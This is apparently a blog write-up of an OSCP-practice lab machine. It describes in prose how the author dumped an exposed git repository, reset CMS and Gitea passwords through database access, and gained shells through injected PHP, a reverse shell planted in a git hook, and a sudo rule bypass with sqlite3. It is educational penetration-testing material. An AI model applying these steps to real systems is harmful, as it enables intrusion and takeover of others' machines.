OSCP Preparation [ devguru ]

j1gs@w
8 min readMar 28, 2023

--

This is the 4th machine that I have done for my OSCP preparation. I learned some new tools for this one! So, let’s get into it!

Target machine’s IP address

First things first, the target machine is identified to be 192.168.181.151 through an nmap scan with the -sn switch and -ON switch to output the results to a file.

Results of port scanning

Using nmap to perform a version scan with the -sV switch and loading the default scripts with the -sC switch and assuming all the hosts are up with the -Pn switch reveals that there is a web server and ssh running on the target machine.

The results also show that a git repository is found with a hostname of devguru.local.

Index page of the target machine

Going to the web server at port 80, reveals a normal company website.

Results of directory brute-forcing

Performing directory brute-forcing with ffuf, shows that a git repository is present and .htaccess is accessible.

backend directory

Also, a backend directory is also discovered by ffuf.

October login page

First of all, the /backend directory goes to an October CMS login page.

Another directory accessible

Secondly, another page was discovered within .htacess, /adminer.php.

adminer.php

adminer.php is a DBMS or a database management system.

Adding devguru.local into /etc/hosts

With all the gathered information, the hostname devguru.local is first added into /etc/hosts so that the git repository is accessible.

Using gitdumper.sh

At this point I was stuck, but looking at other writeups reveal a new tool for me, GitTools. Within GitTools, gitdumper.sh is a bash script used to download as much as possible from the web server’s .git directory when directory listing is disabled.

Using extractor.sh

Also within GitTools is another bash script called extractor.sh. This script will try to recover the contents of the commit.

Contents of the commit

Within the commit, one directory stands out, config.

database configuration within the config directory

Within the config directory, database.php stand out as a DBMS was discovered.

DBMS credentials

Within database.php, the credentials for the DBMS were found.

Databases available

Entering the credentials found on the login page of the DBMS allows access to the DBMS. The database octoberdb was found.

backend_users table

Within the backend_users table, a record containing the credentials of the user frank was found with a bcrypt hashed password.

Cracking the password with JohnTheRipper

At first, I thought the password needed to be cracked so that I can log in to the CMS. However, later I found out that I already have access to the database, so I could just change the password to whatever I wanted. However, I need to generate the bcrypt hash value for the new password.

Generating the bcrypt hash value for the new password

Using the password password, the hash value for that password is generated.

Editing the password for the user frank

Then, within the DBMS, the password of the user frank can be edited to the hash value generated as mentioned above.

Dashboard of October CMS

Using the new password along with frank as the username, gives me access to the CMS.

Exploit found

Knowing that a CMS is being used, I searched for exploits relating to October CMS and found an upload vulnerability.

Proof of concept of upload vulnerability

The proof of concept for exploiting this vulnerability is to upload files which are not in the blockedExtensionsfunction and load the uploaded file through the URL above.

PHP reverse shell

After preparing the PHP reverse shell and uploading several PHP reverse shells with different bypass methods, it was discovered that this attack vector might not be viable.

Attack vector

Looking around the CMS platform, a place to edit PHP code was found. It can be recognised as PHP code as PHP arrays use associative arrays with square brackets.

Exploit

With that said, the function above is added to the index page of the web page to execute system commands specified in the cmd parameter.

Proof of concept

As a proof of concept that the exploit works, the ls command is used and a listing of the CMS working directory is printed out.

Checking for Python

Then, python3 --version is specified in the cmd parameter to check whether Python can be used as an entry point. Doing so reveals Python3 is present on the target machine.

Using a Python reverse shell one-liner

With Python installed, a Python one-liner reverse shell from PentestMonkey can be used to gain a shell on the target machine.

Gaining a shell

After setting up the listener and the listening port, the Python one-liner reverse shell is specified in the cmd parameter. From this, I was able to gain a shell from the target machine.

Downloading linpeas.sh

As normal privilege escalation goes, linpeas.sh is downloaded from the attacker’s machine and made executable.

A backup file was found

After launching linpeas.sh, a backup file was found within /var/backups.

DBMS credentials found

Printing out the file, another set of credentials to the DBMS was found.

Logging into the DBMS, a database named gitea was found.

Credentials for the user frank

Again, within the user table, the credentials to the user frank were found and these values can be changed.

Generating the bcrypt hash value for the new password

Again, the bcrypt hash value for the new password password was generated.

Changing the values on the DBMS

With the new hash value, the credentials were changed with the new password hash algorithm of bcrypt and with the rands and salt fields emptied.

Logging in with the new password using the hostname on port 8585 gives me access to frank’s Gitea account.

Git Hooks for the test repository

An entry vector here is to use Git Hooks. Git Hooks are used to execute commands when a git operation was used. For that reason, a new repository is created for this purpose.

According to (Atlassian, n.d), the server-side hooks are as defined:

  • pre-receive hooks execute every time a git push command was executed
  • update hooks execute after pre-receive hooks
  • post-receive hooks execute whenever a successful git push is executed
A bash reverse shell one-liner

Using the post-receive hook, the above bash reverse shell is added and updated onto the repository.

Cloning the test repository

For the reverse shell to work, the repository needed to be cloned.

Configuring git and pushing onto the repository

After configuring git and adding a file to the repository’s folder, the updated folder is then committed and pushed onto the repository.

Received a second shell

In the background, a listening port on port 9999 listening for incoming connections managed to receive a connection from the target machine.

user flag was found

Within the home directory of the user frank, the user flag was found.

Using sudo -l

Using sudo -l to list out the binaries the user can use sudo on reveals that sqlite3 was allowed to use sudo by the user frank.

Command to gain root with sqlite3

Using GTFOBins, the above command shows how I can gain root through sqlite3. However, it does not work.

Checking sudo version

Using sudo -V shows the sudo version of the target machine. This is needed because looking at sudo -l, root is not allowed to run sqlite3.

Exploit for bypassing sudo rules

However, searching up the sudo version and exploits for it reveal that this rule can be bypassed with the command above (Paramasivam, 2019).

Gained root privileges

Using the command addressed, replacing /bin/bash with sqlite3 gives me root privileges.

Root flag was found

Going to the home directory of the root user, the root flag was found.

In conclusion, this challenge taught me a new tool to use and gave me a refresher to check for more entry points when wanting to gain a shell. Also, there are some parts which I disregarded because I wouldn’t usually find any useful information inside those files such as the backup file found. So, in summary, this challenge taught me to CHECK EVERYTHING.

References

Atlassian. (n.d.). Git Hooks: Atlassian Git Tutorial. Atlassian. Retrieved March 29, 2023, from https://www.atlassian.com/git/tutorials/git-hooks

Paramasivam, M. (2019, October 15). Sudo 1.8.27 — security bypass. Exploit Database. Retrieved March 29, 2023, from https://www.exploit-db.com/exploits/47502

--

--